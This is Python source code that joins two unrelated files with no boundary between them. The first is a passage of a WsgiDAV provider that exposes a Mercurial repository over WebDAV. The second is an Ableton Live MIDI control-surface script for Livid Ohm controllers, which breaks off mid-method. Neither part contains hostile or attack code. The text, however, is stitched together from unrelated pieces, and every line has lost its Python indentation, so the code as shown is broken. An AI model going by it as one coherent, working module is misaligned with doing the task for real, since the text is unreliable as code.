return md5(self.path).hexdigest() + "-" + str(self.getLastModified()) + "-" + str(self.getContentLength())
def getLastModified(self):
if self.isCollection:
return None
# (secs, tz-ofs)
return self.fctx.date()[0]
def supportRanges(self):
return False
def getMemberNames(self):
assert self.isCollection
cache = self.environ["wsgidav.hg.cache"][str(self.rev)]
dirinfos = cache["dirinfos"]
if not dirinfos.has_key(self.localHgPath):
return []
return dirinfos[self.localHgPath][0] + dirinfos[self.localHgPath][1]
# return self.provider._listMembers(self.path)
def getMember(self, name):
        # Rely on the provider to get member instances
assert self.isCollection
return self.provider.getResourceInst(util.joinUri(self.path, name),
self.environ)
def getDisplayInfo(self):
if self.isCollection:
return {"type": "Directory"}
return {"type": "File"}
def getPropertyNames(self, isAllProp):
"""Return list of supported property names in Clark Notation.
See DAVResource.getPropertyNames()
"""
# Let base class implementation add supported live and dead properties
propNameList = super(HgResource, self).getPropertyNames(isAllProp)
# Add custom live properties (report on 'allprop' and 'propnames')
if self.fctx:
propNameList.extend(["{hg:}branch",
"{hg:}date",
"{hg:}description",
"{hg:}filerev",
"{hg:}rev",
"{hg:}user",
])
return propNameList
def getPropertyValue(self, propname):
"""Return the value of a property.
See getPropertyValue()
"""
# Supported custom live properties
if propname == "{hg:}branch":
return self.fctx.branch()
elif propname == "{hg:}date":
# (secs, tz-ofs)
return str(self.fctx.date()[0])
elif propname == "{hg:}description":
return self.fctx.description()
elif propname == "{hg:}filerev":
return str(self.fctx.filerev())
elif propname == "{hg:}rev":
return str(self.fctx.rev())
elif propname == "{hg:}user":
return str(self.fctx.user())
# Let base class implementation report live and dead properties
return super(HgResource, self).getPropertyValue(propname)
def setPropertyValue(self, propname, value, dryRun=False):
"""Set or remove property value.
See DAVResource.setPropertyValue()
"""
raise DAVError(HTTP_FORBIDDEN)
def preventLocking(self):
"""Return True, to prevent locking.
See preventLocking()
"""
if self.rev is not None:
# Only working directory may be locked
return True
return False
def createEmptyResource(self, name):
"""Create and return an empty (length-0) resource as member of self.
See DAVResource.createEmptyResource()
"""
assert self.isCollection
self._checkWriteAccess()
filepath = self._getFilePath(name)
f = open(filepath, "w")
f.close()
commands.add(self.provider.ui, self.provider.repo, filepath)
# getResourceInst() won't work, because the cached manifest is outdated
# return self.provider.getResourceInst(self.path.rstrip("/")+"/"+name, self.environ)
return HgResource(self.path.rstrip("/")+"/"+name, False,
self.environ, self.rev, self.localHgPath+"/"+name)
def createCollection(self, name):
"""Create a new collection as member of self.
A dummy member is created, because Mercurial doesn't handle folders.
"""
assert self.isCollection
self._checkWriteAccess()
collpath = self._getFilePath(name)
os.mkdir(collpath)
filepath = self._getFilePath(name, ".directory")
f = open(filepath, "w")
f.write("Created by WsgiDAV.")
f.close()
commands.add(self.provider.ui, self.provider.repo, filepath)
def getContent(self):
"""Open content as a stream for reading.
See DAVResource.getContent()
"""
assert not self.isCollection
d = self.fctx.data()
return StringIO(d)
def beginWrite(self, contentType=None):
"""Open content as a stream for writing.
See DAVResource.beginWrite()
"""
assert not self.isCollection
self._checkWriteAccess()
mode = "wb"
# GC issue 57: always store as binary
# if contentType and contentType.startswith("text"):
# mode = "w"
return file(self.absFilePath, mode, BUFFER_SIZE)
def endWrite(self, withErrors):
"""Called when PUT has finished writing.
See DAVResource.endWrite()
"""
if not withErrors:
commands.add(self.provider.ui, self.provider.repo, self.localHgPath)
# def handleDelete(self):
# """Handle a DELETE request natively.
#
# """
# self._checkWriteAccess()
# return False
def supportRecursiveDelete(self):
"""Return True, if delete() may be called on non-empty collections
(see comments there)."""
return True
def delete(self):
"""Remove this resource (recursive)."""
self._checkWriteAccess()
filepath = self._getFilePath()
commands.remove(self.provider.ui, self.provider.repo,
filepath,
force=True)
def handleCopy(self, destPath, depthInfinity):
"""Handle a COPY request natively.
"""
destType, destHgPath = util.popPath(destPath)
destHgPath = destHgPath.strip("/")
ui = self.provider.ui
repo = self.provider.repo
util.write("handleCopy %s -> %s" % (self.localHgPath, destHgPath))
if self.rev is None and destType == "edit":
# COPY /edit/a/b to /edit/c/d: turn into 'hg copy -f a/b c/d'
commands.copy(ui, repo,
self.localHgPath,
destHgPath,
force=True)
elif self.rev is None and destType == "released":
# COPY /edit/a/b to /released/c/d
# This is interpreted as 'hg commit a/b' (ignoring the dest. path)
self._commit("WsgiDAV commit (COPY %s -> %s)" % (self.path, destPath))
else:
raise DAVError(HTTP_FORBIDDEN)
# Return True: request was handled
return True
def handleMove(self, destPath):
"""Handle a MOVE request natively.
"""
destType, destHgPath = util.popPath(destPath)
destHgPath = destHgPath.strip("/")
ui = self.provider.ui
repo = self.provider.repo
util.write("handleCopy %s -> %s" % (self.localHgPath, destHgPath))
if self.rev is None and destType == "edit":
# MOVE /edit/a/b to /edit/c/d: turn into 'hg rename -f a/b c/d'
commands.rename(ui, repo, self.localHgPath, destHgPath,
force=True)
elif self.rev is None and destType == "released":
# MOVE /edit/a/b to /released/c/d
# This is interpreted as 'hg commit a/b' (ignoring the dest. path)
self._commit("WsgiDAV commit (MOVE %s -> %s)" % (self.path, destPath))
else:
raise DAVError(HTTP_FORBIDDEN)
# Return True: request was handled
return True
#===============================================================================
# HgResourceProvider
#===============================================================================
class HgResourceProvider(DAVProvider):
"""
DAV provider that serves a VirtualResource derived structure.
"""
def __init__(self, repoRoot):
super(HgResourceProvider, self).__init__()
self.repoRoot = repoRoot
print "Mercurial version %s" % hgversion
self.ui = mercurial.ui.ui()
self.repo = hg.repository(self.ui, repoRoot)
self.ui.status("Connected to repository %s\n" % self.repo.root)
self.repoRoot = self.repo.root
# Some commands (remove) seem to expect cwd set to the repo
# TODO: try to go along without this, because it prevents serving
# multiple repos. Instead pass absolute paths to the commands.
# print os.getcwd()
os.chdir(self.repo.root)
# Verify integrity of the repository
util.status("Verify repository '%s' tree..." % self.repo.root)
commands.verify(self.ui, self.repo)
# self.ui.status("Changelog: %s\n" % self.repo.changelog)
print "Status:"
pprint(self.repo.status())
self.repo.ui.status("the default username to be used in commits: %s\n" % self.repo.ui.username())
# self.repo.ui.status("a short form of user name USER %s\n" % self.repo.ui.shortuser(user))
self.ui.status("Expandpath: %s\n" % self.repo.ui.expandpath(repoRoot))
print "Working directory state summary:"
self.ui.pushbuffer()
commands.summary(self.ui, self.repo, remote=False)
res = self.ui.popbuffer().strip()
reslines = [ tuple(line.split(":", 1)) for line in res.split("\n")]
pprint(reslines)
print "Repository state summary:"
self.ui.pushbuffer()
commands.identify(self.ui, self.repo,
num=True, id=True, branch=True, tags=True)
res = self.ui.popbuffer().strip()
reslines = [ tuple(line.split(":", 1)) for line in res.split("\n")]
pprint(reslines)
self._getLog()
def _getLog(self, limit=None):
"""Read log entries into a list of dictionaries."""
self.ui.pushbuffer()
commands.log(self.ui, self.repo, limit=limit,
date=None, rev=None, user=None)
res = self.ui.popbuffer().strip()
logList = []
for logentry in res.split("\n\n"):
log = {}
logList.append(log)
for line in logentry.split("\n"):
k, v = line.split(":", 1)
assert k in ("changeset", "tag", "user", "date", "summary")
log[k.strip()] = v.strip()
log["parsed_date"] = util.parseTimeString(log["date"])
local_id, unid = log["changeset"].split(":")
log["local_id"] = int(local_id)
log["unid"] = unid
# pprint(logList)
return logList
def _getRepoInfo(self, environ, rev, reload=False):
"""Return a dictionary containing all files under source control.
dirinfos:
Dictionary containing direct members for every collection.
{folderpath: (collectionlist, filelist), ...}
files:
Sorted list of all file paths in the manifest.
filedict:
Dictionary containing all files under source control.
::
{'dirinfos': {'': (['wsgidav',
'tools',
'WsgiDAV.egg-info',
'tests'],
['index.rst',
'wsgidav MAKE_DAILY_BUILD.launch',
'wsgidav run_server.py DEBUG.launch',
'wsgidav-paste.conf',
...
'setup.py']),
'wsgidav': (['addons', 'samples', 'server', 'interfaces'],
['__init__.pyc',
'dav_error.pyc',
'dav_provider.pyc',
...
'wsgidav_app.py']),
},
'files': ['.hgignore',
'ADDONS.txt',
'wsgidav/addons/mysql_dav_provider.py',
...
],
'filedict': {'.hgignore': True,
'README.txt': True,
'WsgiDAV.egg-info/PKG-INFO': True,
}
}
"""
caches = environ.setdefault("wsgidav.hg.cache", {})
if caches.get(str(rev)) is not None:
util.debug("_getRepoInfo(%s): cache hit." % rev)
return caches[str(rev)]
start_time = time.time()
self.ui.pushbuffer()
commands.manifest(self.ui, self.repo, rev)
res = self.ui.popbuffer()
files = []
dirinfos = {}
filedict = {}
for file in res.split("\n"):
if file.strip() == "":
continue
file = file.replace("\\", "/")
# add all parent directories to 'dirinfos'
parents = file.split("/")
if len(parents) >= 1:
p1 = ""
for i in range(0, len(parents)-1):
p2 = parents[i]
dir = dirinfos.setdefault(p1, ([], []))
if p2 not in dir[0]:
dir[0].append(p2)
if p1 == "":
p1 = p2
else:
p1 = "%s/%s" % (p1, p2)
dirinfos.setdefault(p1, ([], []))[1].append(parents[-1])
filedict[file] = True
files.sort()
cache = {"files": files,
"dirinfos": dirinfos,
"filedict": filedict,
}
caches[str(rev)] = cache
util.note("_getRepoInfo(%s) took %.3f" % (rev, time.time() - start_time)
# , var=cache
)
return cache
# def _listMembers(self, path, rev=None):
# """Return a list of all non-collection members"""
# # Pattern for direct members:
# glob = "glob:" + os.path.join(path, "*").lstrip("/")
## print glob
# self.ui.pushbuffer()
# commands.status(self.ui, self.repo,
# glob,
# all=True)
# lines = self.ui.popbuffer().strip().split("\n")
# pprint(lines)
# return dict
def getResourceInst(self, path, environ):
"""Return HgResource object for path.
See DAVProvider.getResourceInst()
"""
self._count_getResourceInst += 1
# HG expects the resource paths without leading '/'
localHgPath = path.strip("/")
rev = None
cmd, rest = util.popPath(path)
if cmd == "":
return VirtualCollection(path, environ,
"root",
["edit", "released", "archive"])
elif cmd == "edit":
localHgPath = rest.strip("/")
rev = None
elif cmd == "released":
localHgPath = rest.strip("/")
rev = "tip"
elif cmd == "archive":
if rest == "/":
# Browse /archive: return a list of revision folders:
loglist = self._getLog(limit=10)
members = [ str(l["local_id"]) for l in loglist ]
return VirtualCollection(path, environ, "Revisions", members)
revid, rest = util.popPath(rest)
try:
int(revid)
except ValueError:
# Tried to access /archive/<something that is not a numeric revision>
return None
# Access /archive/19
rev = revid
localHgPath = rest.strip("/")
else:
return None
# read mercurial repo into request cache
cache = self._getRepoInfo(environ, rev)
if localHgPath in cache["filedict"]:
# It is a version controlled file
return HgResource(path, False, environ, rev, localHgPath)
if localHgPath in cache["dirinfos"] or localHgPath == "":
# It is an existing folder
return HgResource(path, True, environ, rev, localHgPath)
return None
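# URL layout exposed by getResourceInst() above:
#   /edit/...           files from the working directory (rev=None)
#   /released/...       files at the repository tip (rev='tip')
#   /archive            collection listing the most recent revisions by local id
#   /archive/<id>/...   files as of that numeric revision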
# http://www.aumhaa.com
# by amounra 0313
from __future__ import with_statement
import Live
import time
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button on the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompassing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scenes to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from _Framework.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from _Framework.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
"""Imports from _Mono_Framework"""
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.DeviceSelectorComponent import DeviceSelectorComponent
from _Mono_Framework.ResetSendsComponent import ResetSendsComponent
from _Mono_Framework.DetailViewControllerComponent import DetailViewControllerComponent
from _Mono_Framework.MonomodComponent import MonomodComponent
from _Mono_Framework.LiveUtils import *
"""Custom files, overrides, and files from other scripts"""
from _Generic.Devices import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 0, 1, 97, 2, 15, 1, 247)
switchxfaderrgb = (240, 0, 1, 97, 7, 15, 1, 247)
assigncolors = (240, 0, 1, 97, 7, 34, 0, 7, 3, 6, 5, 1, 2, 4, 247)
assign_default_colors = (240, 0, 1, 97, 7, 34, 0, 7, 6, 5, 1, 4, 3, 2, 247)
check_model = (240, 126, 127, 6, 1, 247)
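# The tuples above are raw MIDI SysEx messages: 240 (0xF0) opens and 247 (0xF7)
# closes a SysEx frame. check_model is the standard MIDI Identity Request
# (F0 7E 7F 06 01 F7), sent from query_ohm() so the reply can reveal whether an
# Ohm64 or an OhmRGB is attached. The other messages are Livid-specific
# commands for crossfader switching and pad color assignment; their exact byte
# meanings are assumed from the variable names and are defined by the hardware.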
class FunctionModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(FunctionModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._set_protected_mode_index(0)
def number_of_modes(self):
return 6
def set_mode_buttons(self, buttons):
for button in self._modes_buttons:
button.remove_value_listener(self._mode_value)
self._modes_buttons = []
if (buttons != None):
for button in buttons:
assert isinstance(button, ButtonElement)
identify_sender = True
button.add_value_listener(self._mode_value, identify_sender)
self._modes_buttons.append(button)
for index in range(len(self._modes_buttons)):
if (index == self._mode_index):
self._modes_buttons[index].turn_on()
else:
self._modes_buttons[index].turn_off()
def set_mode_toggle(self, button):
assert ((button == None) or isinstance(button, ButtonElement))
if (self._mode_toggle != None):
self._mode_toggle.remove_value_listener(self._toggle_value)
self._mode_toggle = button
if (self._mode_toggle != None):
self._mode_toggle.add_value_listener(self._toggle_value)
class MonomodModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(MonomodModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._set_protected_mode_index(0)
def number_of_modes(self):
return 2
def set_mode_toggle(self, button):
assert ((button == None) or isinstance(button, ButtonElement))
if (self._mode_toggle != None):
self._mode_toggle.remove_value_listener(self._toggle_value)
self._mode_toggle = button
if (self._mode_toggle != None):
self._mode_toggle.add_value_listener(self._toggle_value)
class ShiftModeComponent(ModeSelectorComponent):
def __init__(self, script, callback, *a, **k):
super(ShiftModeComponent, self).__init__(*a, **k)
assert hasattr(callback, '__call__')
self._script = script
self.update = callback
self._mode_toggle1 = None
self._mode_toggle2 = None
self._toggle1_value = 0
self._toggle2_value = 0
self._mode_index = 0
self._last_mode = 0
self._set_protected_mode_index(0)
def set_mode_toggle(self, button1, button2):
assert ((button1 == None) or isinstance(button1, ButtonElement))
if (self._mode_toggle1 != None):
self._mode_toggle1.remove_value_listener(self._toggle_value_left)
self._mode_toggle1 = button1
if (self._mode_toggle1 != None):
self._mode_toggle1.add_value_listener(self._toggle_value_left)
assert ((button2 == None) or isinstance(button2, ButtonElement))
if (self._mode_toggle2 != None):
self._mode_toggle2.remove_value_listener(self._toggle_value_right)
self._mode_toggle2 = button2
if (self._mode_toggle2 != None):
self._mode_toggle2.add_value_listener(self._toggle_value_right)
def _toggle_value_left(self, value):
self._toggle1_value = value
self._toggle_value(value, 'left')
def _toggle_value_right(self, value):
self._toggle2_value = value
self._toggle_value(value, 'right')
def _toggle_value(self, value, side):
assert (self._mode_toggle1 != None)
assert (self._mode_toggle2 != None)
assert isinstance(value, int)
if((value > 0) and ((side == 'left' and self._toggle2_value > 0) or (side == 'right' and self._toggle1_value > 0))):
if(self._last_mode == 0):
self._last_mode = 1
self.set_mode(4) #self.set_mode(self._last_mode)
else:
self._last_mode = 0
#self.set_mode(self._last_mode)
if(side == 'left'):
self.set_mode(2)
if(side == 'right'):
self.set_mode(3)
#elif((value > 0) and ((side == 'left' and self._toggle2_value > 0) or (side == 'right' and self._toggle1_value > 0))):
elif(value == 0) and (self._toggle1_value == 0) and (self._toggle2_value == 0):
self.set_mode(self._last_mode)
elif(value > 0 and self._last_mode == 1):
self.set_mode(4)
else:
if (side == 'left' and value > 0):
self.set_mode(2)
elif (side == 'right' and value > 0):
self.set_mode(3)
def number_of_modes(self):
return 5
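# Shift mode indices used by ShiftModeComponent (inferred from shift_update()
# in MonOhm below):
#   0 = no shift held, split mixer layout
#   1 = no shift held, linked (main) mixer layout
#   2 = left shift held  (left-side zoom/function view)
#   3 = right shift held (right-side zoom/function view)
#   4 = shift held while the mixer is linked (main zoom/function view)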
class MonOhm(ControlSurface):
__module__ = __name__
__doc__ = " Monomodular control script for Ohm64 and OhmRGB "
def __init__(self, *a, **k):
super(MonOhm, self).__init__(*a, **k)
self._monomod_version = 'b995'
self._codec_version = 'b995'
self._cntrlr_version = 'b995'
self._cntrlr = None
self._host_name = 'MonOhm'
self._color_type = 'OhmRGB'
self._update_linked_device_selection = None
self._link_mixer = LINK_MIXER
self.hosts = []
self._bright = True
self._rgb = 0
self._timer = 0
self.flash_status = 1
self._is_split = True
self._clutch_device_selection = False
self._touched = 0
self._backlight = 127
self._backlight_type = 'static'
self._ohm = 127
self._ohm_type = 'static'
self._pad_translations = PAD_TRANSLATION
self._update_linked_device_selection = None
self._use_pedal = USE_PEDAL
self._disable_master = DISABLE_MASTER_VOLUME
self._mem = [4, 8, 12]
self._mixers = []
self._sessions = []
self._zooms = []
self._function_modes = []
with self.component_guard():
self.log_message("<<<<<<<<<<<<<<<<<<<<= MonOhm " + str(self._monomod_version) + " log opened =>>>>>>>>>>>>>>>>>>>")
self.log_message("<<<<<<<<<<<<<<<<<<<<= Map file for " + str(MAP_VERSION) + " =>>>>>>>>>>>>>>>>>>>")
self._setup_monobridge()
self._setup_controls()
self._setup_transport_control()
self._setup_mixer_control()
self._setup_session_control()
self._setup_device_control()
self._setup_crossfader()
self._setup_device_selector()
self._setup_monomod()
self._setup_modes()
self.song().view.add_selected_track_listener(self._update_selected_device)
if FORCE_TYPE is True:
self._rgb = FORCE_COLOR_TYPE
else:
self.schedule_message(10, self.query_ohm, None)
self.show_message('MonOhm Control Surface Loaded')
self._send_midi(tuple(switchxfader))
#self._send_midi(tuple(assigncolors))
"""script initialization methods"""
def query_ohm(self):
#self.log_message('querying ohm64')
self._send_midi(tuple(check_model))
def _setup_monobridge(self):
self._monobridge = MonoBridgeElement(self)
self._monobridge.name = 'MonoBridge'
def _setup_controls(self):
is_momentary = True
self._fader = [None for index in range(8)]
self._dial = [None for index in range(16)]
self._button = [None for index in range(8)]
self._menu = [None for index in range(6)]
for index in range(8):
self._fader[index] = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, OHM_FADERS[index], Live.MidiMap.MapMode.absolute, 'Fader_' + str(index), index, self)
for index in range(8):
self._button[index] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, OHM_BUTTONS[index], 'Button_' + str(index), self)
for index in range(16):
self._dial[index] = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, OHM_DIALS[index], Live.MidiMap.MapMode.absolute, 'Dial_' + str(index), index + 8, self)
for index in range(6):
self._menu[index] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, OHM_MENU[index], 'Menu_' + str(index), self)
self._crossfader = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, CROSSFADER, Live.MidiMap.MapMode.absolute, "Crossfader", 24, self)
self._livid = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, LIVID, 'Livid_Button', self)
self._shift_l = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, SHIFT_L, 'Shift_Button_Left', self)
self._shift_r = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, SHIFT_R, 'Shift_Button_Right', self)
self._matrix = ButtonMatrixElement()
self._matrix.name = 'Matrix'
self._monomod = ButtonMatrixElement()
self._monomod.name = 'Monomod'
self._grid = [None for index in range(8)]
for column in range(8):
self._grid[column] = [None for index in range(8)]
for row in range(8):
self._grid[column][row] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, (column * 8) + row, 'Grid_' + str(column) + '_' + str(row), self)
for row in range(5):
button_row = []
for column in range(7):
button_row.append(self._grid[column][row])
self._matrix.add_row(tuple(button_row))
for row in range(8):
button_row = []
for column in range(8):
button_row.append(self._grid[column][row])
self._monomod.add_row(tuple(button_row))
self._dummy_button = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 125)
self._dummy_button.name = 'Dummy1'
self._dummy_button2 = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 126)
self._dummy_button2.name = 'Dummy2'
self._dummy_button3 = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 127)
self._dummy_button3.name = 'Dummy3'
self._pedal = [None for index in range(8)]
if self._use_pedal is True:
for index in range(8):
self._pedal[index] = EncoderElement(MIDI_CC_TYPE, 0, 25+index, Live.MidiMap.MapMode.absolute)
self._pedal[index].name = 'Pedal_'+str(index)
self._pedal[index]._report = False
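# Grid wiring summary (as set up above): each pad's note number is
# (column * 8) + row, so the 8x8 grid covers notes 0-63 on CHANNEL.
# self._matrix exposes a 7-column x 5-row sub-grid for the session views,
# while self._monomod exposes the full 8x8 grid for MonomodComponent.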
def _setup_transport_control(self):
self._transport = TransportComponent()
self._transport.name = 'Transport'
def _setup_mixer_control(self):
is_momentary = True
self._num_tracks = 4 # A mixer is one-dimensional
self._mixer = MixerComponent(8, 0, False, True)
self._mixer.name = 'Left_Mixer'
self._mixer.set_track_offset(0) #Sets start point for mixer strip (offset from left)
for index in range(4):
self._mixer.channel_strip(index).set_volume_control(self._fader[index])
for index in range(8):
self._mixer.channel_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer.channel_strip(index))
self._mixer.channel_strip(index).name = 'Mixer_ChannelStrip_' + str(index)
self._mixer.track_filter(index).name = 'Mixer_TrackFilter_' + str(index)
self._mixer.channel_strip(index)._invert_mute_feedback = True
self.song().view.selected_track = self._mixer.channel_strip(0)._track #set the selected strip to the first track, so that we don't, for example, try to assign a button to arm the master track, which would cause an assertion error
self._mixer2 = MixerComponent(4, 4, False, False)
self._mixer2.name = 'Right_Mixer'
self._mixer2.set_track_offset(4)
for index in range(4):
self._mixer2.channel_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer2.channel_strip(index))
self._mixer2.channel_strip(index).name = 'Mixer2_ChannelStrip_' + str(index)
self._mixer2.return_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer2.return_strip(index))
self._mixer2.return_strip(index).name = 'Mixer2_ReturnStrip_' + str(index)
self._mixer2.channel_strip(index).set_volume_control(self._fader[index + 4])
self._mixer2.channel_strip(index)._invert_mute_feedback = True
self._mixer2.return_strip(index)._invert_mute_feedback = True
self._mixers = [self._mixer, self._mixer2]
self._send_reset = ResetSendsComponent(self)
self._send_reset.name = 'Sends_Reset'
self._mixer._reassign_tracks()
self._mixer2._reassign_tracks()
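# Split-mixer layout: self._mixer spans eight channel strips from track offset
# 0 (faders 1-4 are bound to its first four strips here), while self._mixer2
# covers four strips at offset 4 plus the four return strips (faders 5-8).
# In 'linked' mode the assign_main_controls* methods below rebind all eight
# faders to self._mixer instead.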
def _setup_session_control(self):
is_momentary = True
num_tracks = 4
num_scenes = 5
self._session = SessionComponent(num_tracks, num_scenes)
self._session.name = "Left_Session"
self._session.set_offsets(0, 0)
self._session.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene = [None for index in range(5)]
for row in range(num_scenes):
self._scene[row] = self._session.scene(row)
self._scene[row].name = 'L_Scene_' + str(row)
for column in range(num_tracks):
clip_slot = self._scene[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_L_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session.set_mixer(self._mixer)
self._session_zoom = SessionZoomingComponent(self._session)
self._session_zoom.name = 'L_Session_Overview'
self._session_zoom.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom._zoom_button = (self._dummy_button)
self._session_zoom.set_enabled(True)
self._session2 = SessionComponent(num_tracks, num_scenes)
self._session2.name = 'Right_Session'
self._session2.set_offsets(4, 0)
self._session2.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene2 = [None for index in range(5)]
for row in range(num_scenes):
self._scene2[row] = self._session2.scene(row)
self._scene2[row].name = 'R_Scene_' + str(row)
for column in range(num_tracks):
clip_slot = self._scene2[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_R_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session2.set_mixer(self._mixer2)
self._session2.add_offset_listener(self._on_session_offset_changes)
self._session_zoom2 = SessionZoomingComponent(self._session2)
self._session_zoom2.name = 'R_Session_Overview'
self._session_zoom2.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom2.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom2.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom2.set_enabled(True)
self._session_zoom2._zoom_button = (self._dummy_button2)
self._session_main = SessionComponent(8, num_scenes)
self._session_main.name = 'Main_Session'
self._session_main.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene_main = [None for index in range(5)]
for row in range(num_scenes):
self._scene_main[row] = self._session_main.scene(row)
self._scene_main[row].name = 'M_Scene_' + str(row)
for column in range(8):
clip_slot = self._scene_main[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_M_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session_main.set_mixer(self._mixer)
self._session_zoom_main = SessionZoomingComponent(self._session_main)
self._session_zoom_main.name = 'M_Session_Overview'
self._session_zoom_main.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom_main.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom_main.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom_main.set_enabled(True)
self._session_zoom_main._zoom_button = (self._dummy_button3)
self._sessions = [self._session, self._session2, self._session_main]
self._zooms = [self._session_zoom, self._session_zoom2, self._session_zoom_main]
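# Three session views are maintained in parallel: a 4x5 left session at track
# offset 0, a 4x5 right session at offset 4, and an 8x5 'main' session used
# when the mixer halves are linked, each with its own SessionZoomingComponent.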
def _assign_session_colors(self):
num_tracks = 4
num_scenes = 5
self._session.set_stop_track_clip_value(STOP_ALL[self._rgb])
self._session2.set_stop_track_clip_value(STOP_ALL[self._rgb])
self._session_main.set_stop_track_clip_value(STOP_ALL[self._rgb])
for row in range(num_scenes):
for column in range(num_tracks):
self._scene[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
self._scene[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
self._scene2[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene2[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene2[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene2[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
self._scene2[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
for row in range(num_scenes):
for column in range(8):
self._scene_main[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene_main[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene_main[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene_main[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
